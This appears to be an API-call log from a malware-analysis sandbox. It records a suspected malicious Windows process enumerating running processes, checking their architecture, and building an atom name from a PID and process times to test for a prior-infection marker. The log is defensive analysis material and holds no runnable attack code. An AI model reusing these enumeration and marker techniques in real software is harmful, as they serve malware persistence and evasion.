	[0074.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.813] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.813] CloseHandle (hObject=0x224) returned 1
	[0074.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.813] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.813] CloseHandle (hObject=0x224) returned 1
	[0074.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.814] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.814] CloseHandle (hObject=0x224) returned 1
	[0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.814] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.814] CloseHandle (hObject=0x224) returned 1
	[0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.815] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.815] CloseHandle (hObject=0x224) returned 1
	[0074.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.815] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.815] CloseHandle (hObject=0x224) returned 1
	[0074.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.816] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.816] CloseHandle (hObject=0x224) returned 1
	[0074.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.816] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.816] CloseHandle (hObject=0x224) returned 1
	[0074.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.816] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.817] CloseHandle (hObject=0x224) returned 1
	[0074.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.817] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.817] CloseHandle (hObject=0x224) returned 1
	[0074.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.818] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.818] CloseHandle (hObject=0x224) returned 1
	[0074.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.818] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.818] CloseHandle (hObject=0x224) returned 1
	[0074.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.819] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.819] CloseHandle (hObject=0x224) returned 1
	[0074.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.819] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.819] CloseHandle (hObject=0x224) returned 1
	[0074.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728878, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.819] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.820] CloseHandle (hObject=0x224) returned 1
	[0074.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.820] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.820] CloseHandle (hObject=0x224) returned 1
	[0074.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.820] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.820] CloseHandle (hObject=0x224) returned 1
	[0074.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.820] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.821] CloseHandle (hObject=0x224) returned 1
	[0074.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e680, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.821] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.821] CloseHandle (hObject=0x224) returned 1
	[0074.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.822] CloseHandle (hObject=0x224) returned 1
	[0074.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.822] CloseHandle (hObject=0x224) returned 1
	[0074.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.822] CloseHandle (hObject=0x224) returned 1
	[0074.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.822] CloseHandle (hObject=0x224) returned 1
	[0074.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.822] CloseHandle (hObject=0x224) returned 1
	[0074.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea90, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.823] CloseHandle (hObject=0x224) returned 1
	[0074.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e770, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.823] CloseHandle (hObject=0x224) returned 1
	[0074.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.823] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.824] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.824] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.824] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.825] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.826] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.827] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.828] GetLastError () returned 0x5
	[0074.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.829] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.829] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.829] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.829] CloseHandle (hObject=0x224) returned 1
	[0074.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.830] CloseHandle (hObject=0x224) returned 1
	[0074.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e8d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.831] CloseHandle (hObject=0x224) returned 1
	[0074.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0074.867] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
